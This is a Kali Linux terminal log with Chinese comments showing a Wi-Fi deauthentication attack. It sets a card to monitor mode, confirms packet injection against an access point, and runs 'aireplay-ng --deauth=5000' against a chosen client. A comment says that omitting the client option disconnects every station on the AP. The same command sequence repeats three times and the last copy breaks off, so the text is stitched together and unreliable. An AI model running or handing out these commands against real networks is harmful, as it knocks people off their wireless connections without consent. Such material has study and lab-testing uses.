root@kali:~# airmon-ng start wlan1 #将网卡切换到Monitor模式
root@kali:~# iwconfig wlan1mon ch 1#使网卡监听Ch 1信道
root@kali:~# aireplay-ng --test -e Wireless -a 50:fa:84:16:46:ea wlan1mon
02:30:50 Waiting for beacon frame (BSSID: 50:FA:84:16:46:EA) on channel 1
For the given BSSID "50:FA:84:16:46:EA", there is an ESSID mismatch!
Found ESSID "WirelessLab" vs. specified ESSID "Wireless"
Using the given one, double check it to be sure its correct!
02:30:50 Trying broadcast probe requests...
02:30:50 Injection is working! #有这段话,可以认为可以实施注入
02:30:52 Found 1 AP
02:30:52 Trying directed probe requests...
02:30:52 50:FA:84:16:46:EA - channel: 1 - 'Wireless'
02:30:52 Ping (min/avg/max): 3.068ms/6.721ms/14.074ms Power: -60.57
02:30:52 30/30: 100% #
确定AP可以注入后,即可实施断网
root@kali:~# aireplay-ng --deauth=5000 -a 50:fa:84:16:46:ea wlan1mon -c 2C:61:F6:99:AA:22
-c指定一个Station,不加 -c选项则将AP下所有的Station全踢下线
root@kali:~# airmon-ng start wlan1 #将网卡切换到Monitor模式
root@kali:~# iwconfig wlan1mon ch 1#使网卡监听Ch 1信道
root@kali:~# aireplay-ng --test -e Wireless -a 50:fa:84:16:46:ea wlan1mon
02:30:50 Waiting for beacon frame (BSSID: 50:FA:84:16:46:EA) on channel 1
For the given BSSID "50:FA:84:16:46:EA", there is an ESSID mismatch!
Found ESSID "WirelessLab" vs. specified ESSID "Wireless"
Using the given one, double check it to be sure its correct!
02:30:50 Trying broadcast probe requests...
02:30:50 Injection is working! #有这段话,可以认为可以实施注入
02:30:52 Found 1 AP
02:30:52 Trying directed probe requests...
02:30:52 50:FA:84:16:46:EA - channel: 1 - 'Wireless'
02:30:52 Ping (min/avg/max): 3.068ms/6.721ms/14.074ms Power: -60.57
02:30:52 30/30: 100% #
确定AP可以注入后,即可实施断网
root@kali:~# aireplay-ng --deauth=5000 -a 50:fa:84:16:46:ea wlan1mon -c 2C:61:F6:99:AA:22
-c指定一个Station,不加 -c选项则将AP下所有的Station全踢下线
root@kali:~# airmon-ng start wlan1 #将网卡切换到Monitor模式
root@kali:~# iwconfig wlan1mon ch 1#使网卡监听Ch 1信道
root@kali:~# aireplay-ng --test -e Wireless -a 50:fa:84:16:46:ea wlan1mon
02:30:50 Waiting for beacon frame (BSSID: 50:FA:84:16:46:EA) on channel 1
For the given BSSID "50:FA:84:16:46:EA", there is an ESSID mismatch!
Found ESSID "WirelessLab" vs. specified ESSID "Wireless"
Using the given one, double check it to be sure its correct!
02:30:50 Trying broadcast probe requests...
02:30:50 Injection is working! #有这段话,可以认为可以实施注入
02:30:52 Found 1 AP
02:30:52 Trying directed probe requests...
02:30:52 50:FA:84:16:46:EA - channel: 1 - 'Wireless'
02:30:52 Ping (min/avg/max): 3.068ms/6.721ms/14.074ms Power: -60.57
02:30:52 30/30: 100% #